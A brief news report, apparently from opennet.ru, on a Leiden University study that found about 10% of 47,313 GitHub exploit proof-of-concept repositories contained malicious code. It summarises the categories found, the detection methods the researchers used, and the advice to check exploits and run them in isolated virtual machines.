Researchers from the University of Leiden (Netherlands) studied the issue of posting fictitious exploit prototypes on GitHub containing malicious code to attack users who tried to use the exploit to check for a vulnerability. A total of 47313 exploit repositories were analyzed, covering known vulnerabilities identified from 2017 to 2021. An analysis of exploits showed that 4893 (10.3%) of them contain code that performs malicious actions. Users who decide to use published exploits are advised to first examine them for suspicious insertions and run exploits only in virtual machines isolated from the main system.
Two main categories of malicious exploits have been identified - exploits that contain malicious code, for example, to leave a backdoor in the system, download a Trojan, or connect a machine to a botnet, and exploits that collect and send confidential information about the user. In addition, a separate class of harmless bogus exploits has also been identified that do not perform malicious actions, but also do not contain the expected functionality, for example, designed to mislead or warn users who run unverified code from the network.
Several checks were used to detect malicious exploits:
- The exploit code was analyzed for the presence of wired public IP addresses, after which the identified addresses were additionally checked against databases with blacklists of hosts used to control botnets and distribute malicious files.
- The exploits supplied in compiled form have been checked against anti-virus software.
- The presence of atypical hexadecimal dumps or inserts in base64 format was detected in the code, after which these inserts were decoded and studied.
Source: opennet.ru